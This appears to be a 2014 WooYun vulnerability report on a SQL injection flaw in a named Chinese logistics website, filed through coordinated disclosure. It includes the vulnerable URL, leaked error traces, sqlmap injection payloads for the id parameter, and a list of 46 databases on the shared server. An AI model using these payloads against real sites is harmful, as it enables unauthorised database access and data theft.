当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071739

漏洞标题:某物流网站存在sql注入可脱裤,牵涉近20个物流站点

相关厂商:szpsun56.com

漏洞作者: Moo

提交时间:2014-08-11 11:42

修复时间:2014-09-25 11:44

公开时间:2014-09-25 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-11: 细节已通知厂商并且等待厂商处理中
2014-08-16: 厂商已经确认,细节仅向厂商公开
2014-08-26: 细节向核心白帽子及相关领域专家公开
2014-09-05: 细节向普通白帽子公开
2014-09-15: 细节向实习白帽子公开
2014-09-25: 细节向公众公开

简要描述:

RT
root权限。。
裤子 涉及多家物流公司
直接库名 www.库名.com

详细说明:

网站地址 www.szpsun56.com
sql错误路径

http://www.szpsun56.com/news/html/?518.html


加个\报错

Database error: Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\' limit 0,1' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\' limit 0,1) called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select * from {P}_news_con where id='518\' limit 0,1) called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\includes\news.inc.php:36] #2 NewsToUrl() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:8] Database error: Invalid SQL: select title from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select title from pwn_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select title from {P}_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\module\NewsNavPath.php:101] #2 NewsNavPath() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\common.inc.php:524] #3 PrintPage() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:15] Database error: Invalid SQL: select * from pwn_news_con where id='518\'
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''518\'' at line 1)
#0 dbbase_sql->halt(Invalid SQL: select * from pwn_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\db.inc.php:55] #1 dbbase_sql->query(select * from {P}_news_con where id='518\') called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\module\NewsContent.php:34] #2 NewsContent() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\includes\common.inc.php:524] #3 PrintPage() called at [D:\web\yewu\ËÕÖÝÅÅÉÐÎïÁ÷\news\html\index.php:15]


改地址

http://www.szpsun56.com/news/html/index.php?id=518


目测phpweb洞洞 上次官方更新了补丁。过滤了单引号。现在都是%27了、、、
单引号不能直接的可参造单引号的绕过
权限有点小大

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
current user is DBA:    True


QQ截图20140809192821.png


漏洞证明:

[19:20:42] [INFO] retrieved: "",""
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system user


Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=518' AND 8992=8992 AND 'SvZD'='SvZD
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=518' AND (SELECT 2420 FROM(SELECT COUNT(*),CONCAT(0x716f646871,(SELECT (CASE WHEN (2420=2420) THEN 1 ELSE 0 END)),0x7162676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'XPfj'='XPfj
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: id=-5917' UNION ALL SELECT CONCAT(0x716f646871,0x66646d46727573796d4b,0x7162676d71)#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=518' AND SLEEP(5) AND 'cxmb'='cxmb
---
[19:11:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0


available databases [46]:                                                                              
[*] 021jadever
[*] 0551kyaji
[*] 0817jp
[*] 0817yt
[*] aaa
[*] abc
[*] baiqiang
[*] ceshi
[*] dataiyaojt
[*] df999pme
[*] fsmbhj
[*] fsrattanjiaju
[*] gjlpf
[*] huaan56
[*] information_schema
[*] jadever021
[*] kmxydn
[*] men
[*] menjing
[*] minshi56
[*] mysql
[*] nchszs
[*] nczxsj
[*] qiyezhan
[*] sdyspme
[*] shoulianqingxin
[*] sjgzs
[*] suheng
[*] sz56at
[*] sz56stg
[*] szjl56
[*] szksdwl
[*] szpsun56
[*] szta
[*] szta56
[*] szxdwl
[*] szxt56
[*] tengyi
[*] test
[*] tfpme
[*] wordpress
[*] wxjz56
[*] xiaoai
[*] yiliao
[*] zssj
[*] ztuowl

修复方案:

.......

版权声明:转载请注明来源 Moo@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-08-16 08:34

厂商回复:

最新状态:

2014-08-20:补充一下处置情况:CNVD确认并复现所述情况,已经由CNVD按网站公开渠道向网站管理方邮件通报。

漏洞评价:

评论

  1. 2014-12-28 15:16 | 天明 ( 实习白帽子 | Rank:59 漏洞数:17 | 我要为大叔报仇。)

    洞主,能否详细告知怎么绕过